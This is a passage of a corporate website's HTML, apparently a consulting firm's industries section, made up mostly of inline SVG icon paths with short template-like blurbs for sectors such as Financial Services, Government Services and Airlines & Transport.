3.661z"></path><path d="m130.238 347.994c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.047 54.268c-2.054 2.184-2.613 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v27.289c0 4.15 3.365 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-34.804c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.884c-4.15 0-7.515 3.365-7.515 7.515v89.56h-42.526v-24.697c0-4.15-3.365-7.515-7.515-7.515s-7.515 3.365-7.515 7.515v32.212c0 4.15 3.365 7.515 7.515 7.515h57.555c4.15 0 7.515-3.365 7.515-7.515v-89.56h14.754c2.997 0 5.708-1.781 6.898-4.533 1.189-2.751.63-5.947-1.424-8.13z"></path><path d="m263.229 296.294c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.046 54.269c-2.054 2.184-2.614 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v141.259c0 4.15 3.365 7.515 7.515 7.515h57.555c4.151 0 7.515-3.365 7.515-7.515v-141.259h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13zm23.304 51.903c-4.151 0-7.515 3.365-7.515 7.515v141.259h-42.526v-141.26c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.882z"></path><path d="m396.221 248.46c-1.42-1.51-3.401-2.366-5.474-2.366-2.072 0-4.054.856-5.474 2.366l-51.047 54.268c-2.054 2.183-2.614 5.379-1.425 8.13 1.19 2.752 3.9 4.533 6.898 4.533h14.754v45.859c0 4.15 3.364 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-53.373c0-4.15-3.364-7.515-7.515-7.515h-4.883l33.661-35.786 33.66 35.786h-4.883c-4.151 0-7.515 3.365-7.515 7.515v189.094h-42.526v-105.662c0-4.15-3.364-7.515-7.515-7.515s-7.515 3.364-7.515 7.515v113.177c0 4.15 3.364 7.515 7.515 7.515h57.556c4.151 0 7.515-3.365 7.515-7.515v-189.095h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13z"></path><path d="m92.805 139.396c0-4.15-3.365-7.515-7.515-7.515h-44.075c-4.15 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151-.001 7.515-3.365 7.515-7.515z"></path><path d="m95.012 198.37-15.676 6.141c-3.865 1.514-5.77 5.874-4.256 9.738 1.161 2.964 3.997 4.775 6.999 4.775.912 0 1.839-.167 2.739-.52l15.676-6.141c3.865-1.514 5.77-5.874 4.256-9.738-1.515-3.863-5.875-5.769-9.738-4.255z"></path><path d="m79.336 74.279 15.676 6.141c.901.353 1.827.52 2.739.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.256-9.738l-15.676-6.141c-3.866-1.514-8.224.392-9.738 4.256-1.514 3.863.392 8.223 4.256 9.737z"></path><path d="m470.785 131.881h-44.075c-4.151 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151 0 7.515-3.365 7.515-7.515-.001-4.15-3.365-7.515-7.515-7.515z"></path><path d="m411.506 212.365 15.675 6.141c.901.353 1.828.52 2.74.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.255-9.738l-15.675-6.141c-3.868-1.514-8.224.392-9.739 4.256-1.514 3.862.391 8.222 4.255 9.737z"></path><path d="m414.25 80.94c.912 0 1.84-.167 2.74-.52l15.675-6.141c3.864-1.514 5.769-5.874 4.255-9.738-1.515-3.865-5.876-5.768-9.739-4.256l-15.675 6.141c-3.864 1.514-5.769 5.874-4.255 9.738 1.161 2.965 3.997 4.776 6.999 4.776z"></path></g></svg>					
			        				            <h6>Financial Services</h6>			            <p>We help financial institutions, from banking and insurance to wealth and securities distribution, manage risks.</p>			        
						<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M505.709,159.575L336.462,50.682c-3.379-2.174-7.879-1.196-10.052,2.181c-2.173,3.378-1.197,7.878,2.181,10.052    l166.773,107.301h-38.878L266.64,48.07c-6.463-4.158-14.816-4.157-21.28,0L55.514,170.216H16.636L255.991,16.204l33.899,21.81    c3.379,2.173,7.878,1.197,10.052-2.181c2.173-3.378,1.197-7.878-2.181-10.052l-33.899-21.81c-4.776-3.073-10.947-3.073-15.723,0    L6.291,159.575c-5.15,3.314-7.45,9.488-5.723,15.364c1.727,5.876,7.002,9.824,13.126,9.824h36.684v25.07v21.956    c0,5.789,4.106,10.637,9.558,11.784v12.801c0,6.64,5.402,12.042,12.042,12.042h1v89.112c0,4.017,3.256,7.273,7.273,7.273    c4.017,0,7.273-3.256,7.273-7.273v-96.385c0-4.017-3.256-7.273-7.273-7.273h-5.768v-10.04h51.513v10.038h-5.768    c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.273,7.273,7.273h5.768v10.915H74.483V429.11h5.768    c4.017,0,7.273-3.256,7.273-7.273v-18.59c0-4.017-3.256-7.273-7.273-7.273c-4.017,0-7.273,3.256-7.273,7.273v11.317h-1    c-6.64,0-12.042,5.401-12.042,12.041v12.801c-5.453,1.147-9.558,5.995-9.558,11.784v14.682H24.614    c-8.04,0-14.581,6.541-14.581,14.581v15.299c0,8.04,6.541,14.581,14.581,14.581h462.772c8.04,0,14.581-6.541,14.581-14.581    v-15.299c0-8.04-6.541-14.581-14.581-14.581h-25.764V451.19c0-5.789-4.106-10.637-9.558-11.784v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-21.956v-25.07h36.684c6.124,0,11.399-3.948,13.126-9.824    C513.159,169.063,510.859,162.888,505.709,159.575z M253.23,60.303c1.683-1.083,3.857-1.082,5.54,0l170.833,109.914H82.398    L253.23,60.303z M64.924,184.762h382.151v17.797h-77.902h-70.585h-85.176h-70.585H64.924V184.762z M296.304,439.408v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-14.683H361.9v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682h-56.038v-14.682C305.862,445.403,301.756,440.555,296.304,439.408z     M140.542,439.408v-12.801c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.452-1.147,9.558-5.995,9.558-11.784v-14.683h56.039v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682H150.1v-14.682C150.1,445.403,145.994,440.555,140.542,439.408z M275.989,429.11    h5.768v10.915h-51.513V429.11h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142c0-4.017-3.256-7.274-7.273-7.274h-5.768V243.83    h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696C268.716,425.854,271.972,429.11,275.989,429.11z M222.97,229.284    h-0.032h-2.253v-12.178h70.63v12.178h-2.285c-0.005,0-0.011,0.001-0.016,0.001s-0.011-0.001-0.016-0.001H222.97z M220.685,454.213    c0.71,0.231,1.466,0.36,2.253,0.36h66.059c0.811,0,1.589-0.139,2.318-0.384v11.684h-70.63V454.213z M67.21,229.284h-2.285v-12.178    h70.63v12.178h-0.001h-2.285H67.21z M64.924,454.201c0.719,0.238,1.486,0.372,2.285,0.372h66.06c0.799,0,1.566-0.134,2.285-0.372    v11.672h-70.63V454.201z M487.421,480.454l-0.02,15.333c0,0-0.004,0.001-0.015,0.001l-462.807-0.034l0.035-15.334L487.421,480.454    z M444.77,454.572c0.807,0,1.58-0.137,2.306-0.379v11.68h-70.63v-11.665c0.713,0.234,1.473,0.364,2.265,0.364H444.77z     M391.772,253.869h-5.768V243.83h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.274,7.273,7.274    h5.768v10.915h-51.513v-10.915h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142C399.045,257.125,395.789,253.869,391.772,253.869z     M447.077,229.284L447.077,229.284h-2.286c-0.003,0-0.007,0.001-0.01,0.001s-0.007-0.001-0.01-0.001h-66.039h-0.02h-2.265v-12.178    h70.63V229.284z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M259.076,113.165V90.459c7.83,0.559,10.738,4.138,13.422,4.138c3.356,0,4.922-4.25,4.922-6.375    c0-5.48-10.738-7.829-18.344-8.053v-3.02c0-1.343-1.677-2.573-3.355-2.573c-1.902,0-3.244,1.231-3.244,2.573v3.244    c-10.626,1.118-21.252,6.711-21.252,20.804c0,14.317,11.186,18.344,21.252,21.923v26.283c-11.409-0.894-14.429-8.724-18.12-8.724    c-2.796,0-5.145,3.691-5.145,6.376c0,5.481,9.395,12.975,23.265,13.199h0v3.468c0,1.343,1.342,2.573,3.244,2.573    c1.677,0,3.355-1.231,3.355-2.573v-3.803c12.08-1.677,20.357-9.283,20.357-23.041    C279.433,121.666,268.807,116.744,259.076,113.165z M253.149,111.04c-5.929-2.237-10.738-4.586-10.738-10.962    c0-5.816,4.474-8.612,10.738-9.395V111.04z M258.406,149.181V125.58c5.48,2.349,9.842,5.481,9.843,12.528    C268.249,144.483,264.446,148.063,258.406,149.181z"></path>
	</g>
</g>
</svg>					
			        				            <h6>Government Services</h6>			            <p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>			        
						<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512.01 512.01"><g><path d="m479.659 248.51h-72.427l27.649-15.963c15.448-8.919 20.76-28.743 11.841-44.191l-85.052-147.317-1.922-3.329-12.424-21.52c-4.32-7.483-11.297-12.836-19.644-15.073-8.349-2.238-17.065-1.088-24.548 3.232l-154.14 88.993c-3.587 2.071-4.816 6.658-2.745 10.245s6.658 4.817 10.245 2.745l154.14-88.993c8.284-4.782 18.917-1.935 23.701 6.351l8.675 15.025-316.994 183.016-8.675-15.026c-2.317-4.013-2.933-8.689-1.733-13.166 1.2-4.476 4.07-8.217 8.084-10.535l105.905-61.144c3.587-2.071 4.816-6.658 2.745-10.245s-6.658-4.817-10.245-2.745l-105.906 61.145c-7.483 4.32-12.836 11.296-15.073 19.643-2.236 8.346-1.089 17.064 3.232 24.547l12.423 21.517c.001.001.001.003.002.004l12.425 21.521 74.55 129.125c2.93 5.074 7.173 9.228 12.228 12.056v81.232c0 17.838 14.512 32.35 32.35 32.35h226.715c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-226.714c-9.567 0-17.35-7.783-17.35-17.35v-85.724c.004-.085-.001-.168 0-.253v-112.823c0-9.567 7.783-17.35 17.35-17.35h230.9c.008 0 .015.001.023.001.007 0 .015-.001.023-.001h100.387c9.567 0 17.351 7.783 17.351 17.35v198.8c0 9.567-7.783 17.35-17.351 17.35h-74.616c-4.143 0-7.5 3.358-7.5 7.5s3.357 7.5 7.5 7.5h74.616c17.838 0 32.351-14.512 32.351-32.35v-198.8c-.001-17.838-14.514-32.35-32.352-32.35zm-129.151-196.805 2.637 4.568 6.429 11.136-316.993 183.017-9.067-15.704zm-234.531 229.155v96.692l-65.897-114.136 316.994-183.017 66.658 115.456c4.783 8.285 1.934 18.917-6.351 23.701l-50.149 28.954h-228.905c-17.838 0-32.35 14.512-32.35 32.35z"></path><path d="m389.037 154.707c-2.07-3.587-6.66-4.816-10.245-2.745l-71.736 41.417c-3.587 2.071-4.816 6.658-2.745 10.245 1.389 2.406 3.91 3.751 6.502 3.751 1.272 0 2.563-.324 3.743-1.006l71.736-41.417c3.587-2.071 4.816-6.658 2.745-10.245z"></path><path d="m402.858 193.646c3.587-2.071 4.816-6.658 2.745-10.245s-6.66-4.816-10.245-2.745l-28.694 16.567c-3.587 2.071-4.816 6.658-2.745 10.245 1.39 2.406 3.91 3.751 6.502 3.751 1.272 0 2.563-.324 3.743-1.006z"></path><path d="m363.409 346.343h83.4c8.547 0 15.5-6.953 15.5-15.5v-17.133c0-8.547-6.953-15.5-15.5-15.5h-83.4c-8.547 0-15.5 6.953-15.5 15.5v17.133c0 8.547 6.953 15.5 15.5 15.5zm-.5-32.633c0-.276.225-.5.5-.5h83.4c.275 0 .5.224.5.5v17.133c0 .276-.225.5-.5.5h-83.4c-.275 0-.5-.224-.5-.5z"></path><path d="m246.943 347.41v-50.267c0-8.547-6.953-15.5-15.5-15.5h-66.833c-8.547 0-15.5 6.953-15.5 15.5v50.267c0 8.547 6.953 15.5 15.5 15.5h66.833c8.547 0 15.5-6.953 15.5-15.5zm-15-50.267v17.633h-26.417v-18.133h25.917c.276 0 .5.224.5.5zm-67.333-.5h25.917v18.133h-26.417v-17.633c0-.276.224-.5.5-.5zm-.5 50.767v-17.633h67.833v17.633c0 .276-.224.5-.5.5h-66.833c-.276 0-.5-.224-.5-.5z"></path><path d="m156.61 430.743c-4.142 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5h33.133c4.142 0 7.5-3.358 7.5-7.5s-3.358-7.5-7.5-7.5z"></path><path d="m222.876 445.743h99.4c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-99.4c-4.142 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5z"></path><path d="m355.409 445.743h49.7c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-49.7c-4.143 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5z"></path></g></svg>					
			        				            <h6>Consumer Products</h6>			            <p>Our work draws on more than 40 years of experience, delivered by 5,700 professionals in the world.</p>			        
		        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><g><path d="m257.756 273.413c75.381 0 136.707-61.326 136.707-136.707 0-75.38-61.326-136.706-136.707-136.706s-136.707 61.326-136.707 136.706c0 75.381 61.327 136.707 136.707 136.707zm0-258.384c67.093 0 121.677 54.584 121.677 121.677s-54.584 121.678-121.677 121.678-121.678-54.584-121.678-121.678c0-67.092 54.585-121.677 121.678-121.677z"></path><path d="m257.755 235.574c54.516 0 98.868-44.352 98.868-98.867s-44.352-98.867-98.868-98.867c-24.609 0-48.193 9.099-66.407 25.621-3.074 2.789-3.305 7.541-.517 10.615 2.789 3.074 7.542 3.307 10.615.517 15.443-14.009 35.441-21.724 56.309-21.724 46.229 0 83.839 37.61 83.839 83.838s-37.61 83.838-83.839 83.838c-46.228 0-83.837-37.609-83.837-83.838 0-13.96 3.497-27.777 10.114-39.957 1.981-3.647.631-8.209-3.016-10.19-3.646-1.982-8.208-.63-10.19 3.016-7.809 14.375-11.937 30.673-11.937 47.131 0 54.515 44.351 98.867 98.866 98.867z"></path><path d="m254.898 172.111c-11.802-.719-15.044-7.822-15.645-9.491-.86-3.212-3.782-5.58-7.265-5.58-4.158 0-7.529 3.371-7.529 7.53 0 .604.079 1.188.213 1.751l-.003.001c.007.027.021.079.04.144.092.355.201.703.342 1.036 1.39 3.834 6.959 15.729 23.371 18.907v9.999c0 4.15 3.365 7.515 7.515 7.515 4.151 0 7.515-3.364 7.515-7.515v-9.773c7.193-1.252 12.025-4.396 15.046-7.239 5.621-5.29 8.977-13.286 8.977-21.39 0-7.615-2.986-25.655-30.649-28.707-5.48-.605-9.389-2.349-11.62-5.183-1.969-2.503-2.182-5.268-2.182-6.341 0-1.322.363-12.913 12.913-12.913 8.234 0 11.559 5.237 12.184 6.376 1.114 2.766 3.818 4.72 6.982 4.72 4.158 0 7.529-3.371 7.529-7.529 0-1.236-.304-2.4-.832-3.429l.004-.002c-2.118-4.604-8.099-11.807-18.353-14.287v-10.087c0-4.15-3.364-7.515-7.515-7.515-4.15 0-7.515 3.365-7.515 7.515v10.055c-14.832 3.522-20.428 17.361-20.428 27.095 0 10.823 7.119 24.248 27.183 26.462 17.268 1.906 17.268 10.835 17.268 13.769 0 3.117-1.115 7.498-4.247 10.445-2.961 2.787-7.433 4.019-13.299 3.661z"></path><path d="m130.238 347.994c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.047 54.268c-2.054 2.184-2.613 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v27.289c0 4.15 3.365 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-34.804c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.884c-4.15 0-7.515 3.365-7.515 7.515v89.56h-42.526v-24.697c0-4.15-3.365-7.515-7.515-7.515s-7.515 3.365-7.515 7.515v32.212c0 4.15 3.365 7.515 7.515 7.515h57.555c4.15 0 7.515-3.365 7.515-7.515v-89.56h14.754c2.997 0 5.708-1.781 6.898-4.533 1.189-2.751.63-5.947-1.424-8.13z"></path><path d="m263.229 296.294c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.046 54.269c-2.054 2.184-2.614 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v141.259c0 4.15 3.365 7.515 7.515 7.515h57.555c4.151 0 7.515-3.365 7.515-7.515v-141.259h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13zm23.304 51.903c-4.151 0-7.515 3.365-7.515 7.515v141.259h-42.526v-141.26c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.882z"></path><path d="m396.221 248.46c-1.42-1.51-3.401-2.366-5.474-2.366-2.072 0-4.054.856-5.474 2.366l-51.047 54.268c-2.054 2.183-2.614 5.379-1.425 8.13 1.19 2.752 3.9 4.533 6.898 4.533h14.754v45.859c0 4.15 3.364 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-53.373c0-4.15-3.364-7.515-7.515-7.515h-4.883l33.661-35.786 33.66 35.786h-4.883c-4.151 0-7.515 3.365-7.515 7.515v189.094h-42.526v-105.662c0-4.15-3.364-7.515-7.515-7.515s-7.515 3.364-7.515 7.515v113.177c0 4.15 3.364 7.515 7.515 7.515h57.556c4.151 0 7.515-3.365 7.515-7.515v-189.095h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13z"></path><path d="m92.805 139.396c0-4.15-3.365-7.515-7.515-7.515h-44.075c-4.15 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151-.001 7.515-3.365 7.515-7.515z"></path><path d="m95.012 198.37-15.676 6.141c-3.865 1.514-5.77 5.874-4.256 9.738 1.161 2.964 3.997 4.775 6.999 4.775.912 0 1.839-.167 2.739-.52l15.676-6.141c3.865-1.514 5.77-5.874 4.256-9.738-1.515-3.863-5.875-5.769-9.738-4.255z"></path><path d="m79.336 74.279 15.676 6.141c.901.353 1.827.52 2.739.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.256-9.738l-15.676-6.141c-3.866-1.514-8.224.392-9.738 4.256-1.514 3.863.392 8.223 4.256 9.737z"></path><path d="m470.785 131.881h-44.075c-4.151 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151 0 7.515-3.365 7.515-7.515-.001-4.15-3.365-7.515-7.515-7.515z"></path><path d="m411.506 212.365 15.675 6.141c.901.353 1.828.52 2.74.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.255-9.738l-15.675-6.141c-3.868-1.514-8.224.392-9.739 4.256-1.514 3.862.391 8.222 4.255 9.737z"></path><path d="m414.25 80.94c.912 0 1.84-.167 2.74-.52l15.675-6.141c3.864-1.514 5.769-5.874 4.255-9.738-1.515-3.865-5.876-5.768-9.739-4.256l-15.675 6.141c-3.864 1.514-5.769 5.874-4.255 9.738 1.161 2.965 3.997 4.776 6.999 4.776z"></path></g></svg>	        
				<h5><a href="#">Financial Services</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><g><path d="m456.907 161.731-36.977-14.932c-5.967-2.408-12.25-3.628-18.678-3.628-.03 0-.06 0-.09 0l-24.136.04-20.518-19.911c5.611-3.677 9.33-10.01 9.33-17.204 0-11.34-9.227-20.567-20.567-20.567h-26.483c-.377 0-.745.037-1.107.091l-83.802-81.325c-2.83-2.748-6.562-4.263-10.51-4.267l-42.989-.028c-.002 0-.004 0-.005 0-3.635 0-7.013 1.96-8.815 5.118-1.804 3.158-1.774 7.065.075 10.194l75.651 128.099-41.77.065c-1.196.001-2.404.092-3.59.27-.059.009-.118.018-.177.029l-70.077 12.26-49.75-37.177c-2.049-1.533-4.583-2.376-7.139-2.376-.008 0-.016 0-.023 0l-24.191.042c-3.835.008-7.347 2.111-9.164 5.488s-1.637 7.465.468 10.667l34.021 51.798-33.842 51.918c-2.094 3.213-2.258 7.302-.427 10.673 1.827 3.363 5.337 5.45 9.161 5.45h.021l24.19-.042c2.566-.005 5.106-.857 7.149-2.397l49.624-37.352 70.119 12.016c.061.011.123.02.185.029 1.18.171 2.397.244 3.577.257l41.861-.065-37.682 63.807c-6.849-3.421-10.843-6.886-12.607-8.651-1.956-1.955-3.795-4.086-5.467-6.335-3.195-4.301-8.101-6.773-13.46-6.787-.015 0-.028 0-.042 0-5.355 0-10.271 2.457-13.49 6.745-1.672 2.226-3.536 4.371-5.544 6.377-6.604 6.605-22.881 17.722-57.691 17.975l-11.326.082c-6.876.05-12.471 5.685-12.471 12.562v40.948c0 4.109 3.33 7.439 7.439 7.439s7.439-3.33 7.439-7.439v-38.647l9.027-.066c40.116-.292 59.888-14.117 68.103-22.331 2.501-2.501 4.829-5.181 6.922-7.967.521-.694 1.22-.8 1.593-.8h.005c.445.002 1.075.139 1.556.786 2.104 2.828 4.421 5.513 6.886 7.979 6.615 6.614 26.491 22.031 68.105 22.333l9.027.066v73.838c0 14.933-3.471 29.913-10.038 43.322s-16.273 25.336-28.07 34.493l-37.26 28.918c-2.961 2.297-6.503 3.511-10.245 3.511s-7.284-1.214-10.243-3.51l-37.261-28.919c-11.796-9.156-21.503-21.083-28.07-34.493-6.566-13.409-10.038-28.389-10.038-43.322 0-4.109-3.33-7.439-7.439-7.439s-7.439 3.33-7.439 7.439c0 17.188 3.995 34.432 11.554 49.866 7.559 15.435 18.731 29.163 32.308 39.702l37.262 28.919c5.513 4.278 12.39 6.635 19.364 6.635s13.852-2.357 19.366-6.636l37.261-28.918c13.578-10.538 24.749-24.267 32.308-39.702s11.554-32.678 11.554-49.866v-76.137c0-6.877-5.595-12.511-12.471-12.562l-11.326-.082c-12.598-.091-22.805-1.715-30.964-3.98l40.855-69.179 91.634-.143-61.47 59.654c-2.947 2.861-3.018 7.57-.157 10.519 1.459 1.502 3.398 2.258 5.339 2.258 1.866 0 3.735-.698 5.18-2.101l10.856-10.535h29.081c11.34 0 20.567-9.226 20.567-20.566 0-7.553-4.105-14.151-10.19-17.727l22.191-21.535 23.463-.037c6.462-.012 12.773-1.254 18.756-3.695l36.925-15.059c9.181-3.745 14.875-12.23 14.857-22.145-.011-9.916-5.734-18.383-14.927-22.095zm-111.636 96.602c3.137 0 5.69 2.552 5.69 5.69 0 3.136-2.552 5.689-5.69 5.689h-13.751l11.724-11.378h2.027zm0-157.927c3.137 0 5.69 2.552 5.69 5.69 0 3.137-2.552 5.69-5.69 5.69h-.629l-11.726-11.379h12.355zm106.094 91.789-36.925 15.059c-4.2 1.712-8.628 2.585-13.163 2.593l-195.645.306c-.003 0-.007 0-.01 0-.442 0-.886-.03-1.325-.09l-73.178-12.541c-2.016-.346-4.092.156-5.73 1.389l-51.403 38.691-14.976.025 32.007-49.102c1.615-2.477 1.609-5.675-.015-8.146l-32.177-48.991 14.975-.025 51.538 38.513c1.643 1.226 3.719 1.72 5.734 1.369l73.138-12.796c.438-.062.882-.093 1.325-.094l113.263-.177c4.109-.007 7.434-3.342 7.427-7.45-.007-4.105-3.336-7.427-7.439-7.427-.004 0-.008 0-.012 0l-54.228.085-75.886-128.503 34.698.022c.06 0 .116.022.159.064l132.182 128.277-1.783.003c-4.108.007-7.433 3.343-7.426 7.451.007 4.104 3.336 7.426 7.439 7.426h.013l47.247-.078h.063c4.512 0 8.923.857 13.109 2.546l36.976 14.931c5.212 2.105 5.625 6.904 5.628 8.325 0 1.421-.396 6.222-5.6 8.345z"></path><path d="m234.902 173.999c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.325-4.324-9.639-9.649-9.635z"></path><path d="m270.583 173.976c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.324-4.323-9.638-9.649-9.635z"></path><path d="m305.624 173.954c-5.325.003-9.639 4.323-9.636 9.648s4.323 9.639 9.648 9.635c5.325-.003 9.639-4.323 9.635-9.648-.003-5.325-4.322-9.639-9.647-9.635z"></path><path d="m341.305 173.931c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.005-5.324-4.324-9.638-9.649-9.635z"></path><path d="m150.203 316.284c-10.855 3.962-22.954 6.715-35.961 8.183-5.408.611-9.486 5.179-9.486 10.628v51.148c0 27.281 12.36 52.522 33.911 69.248l32.996 25.608c1.932 1.501 4.247 2.251 6.562 2.251s4.629-.75 6.559-2.249l32.997-25.61c21.551-16.726 33.912-41.965 33.912-69.248v-51.148c0-5.45-4.08-10.02-9.487-10.628-13.006-1.467-25.105-4.221-35.96-8.183-7.22-2.635-13.734-5.768-19.359-9.314-5.262-3.318-12.062-3.317-17.324-.001-5.627 3.546-12.14 6.681-19.36 9.315zm28.749 3.271c6.519 4.109 13.986 7.71 22.193 10.706 10.908 3.98 22.892 6.847 35.67 8.534v47.448c0 22.652-10.262 43.608-28.157 57.495l-30.435 23.621-30.435-23.621c-17.894-13.888-28.156-34.843-28.156-57.495v-47.448c12.779-1.687 24.761-4.553 35.67-8.534 8.209-2.996 15.676-6.598 22.193-10.706.449-.283 1.008-.283 1.457 0z"></path><path d="m145.068 374.175c-3.261 2.498-3.88 7.167-1.382 10.429l23.844 31.134c1.397 1.823 3.557 2.899 5.854 2.915h.051c2.278 0 4.431-1.044 5.843-2.835l43-54.567c2.543-3.226 1.989-7.904-1.239-10.446-3.224-2.543-7.904-1.988-10.446 1.239l-37.073 47.046-18.023-23.533c-2.497-3.26-7.164-3.879-10.429-1.382z"></path></g></svg>	        
				<h5><a href="#">Airlines & Transport</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M505.709,159.575L336.462,50.682c-3.379-2.174-7.879-1.196-10.052,2.181c-2.173,3.378-1.197,7.878,2.181,10.052    l166.773,107.301h-38.878L266.64,48.07c-6.463-4.158-14.816-4.157-21.28,0L55.514,170.216H16.636L255.991,16.204l33.899,21.81    c3.379,2.173,7.878,1.197,10.052-2.181c2.173-3.378,1.197-7.878-2.181-10.052l-33.899-21.81c-4.776-3.073-10.947-3.073-15.723,0    L6.291,159.575c-5.15,3.314-7.45,9.488-5.723,15.364c1.727,5.876,7.002,9.824,13.126,9.824h36.684v25.07v21.956    c0,5.789,4.106,10.637,9.558,11.784v12.801c0,6.64,5.402,12.042,12.042,12.042h1v89.112c0,4.017,3.256,7.273,7.273,7.273    c4.017,0,7.273-3.256,7.273-7.273v-96.385c0-4.017-3.256-7.273-7.273-7.273h-5.768v-10.04h51.513v10.038h-5.768    c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.273,7.273,7.273h5.768v10.915H74.483V429.11h5.768    c4.017,0,7.273-3.256,7.273-7.273v-18.59c0-4.017-3.256-7.273-7.273-7.273c-4.017,0-7.273,3.256-7.273,7.273v11.317h-1    c-6.64,0-12.042,5.401-12.042,12.041v12.801c-5.453,1.147-9.558,5.995-9.558,11.784v14.682H24.614    c-8.04,0-14.581,6.541-14.581,14.581v15.299c0,8.04,6.541,14.581,14.581,14.581h462.772c8.04,0,14.581-6.541,14.581-14.581    v-15.299c0-8.04-6.541-14.581-14.581-14.581h-25.764V451.19c0-5.789-4.106-10.637-9.558-11.784v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-21.956v-25.07h36.684c6.124,0,11.399-3.948,13.126-9.824    C513.159,169.063,510.859,162.888,505.709,159.575z M253.23,60.303c1.683-1.083,3.857-1.082,5.54,0l170.833,109.914H82.398    L253.23,60.303z M64.924,184.762h382.151v17.797h-77.902h-70.585h-85.176h-70.585H64.924V184.762z M296.304,439.408v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-14.683H361.9v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    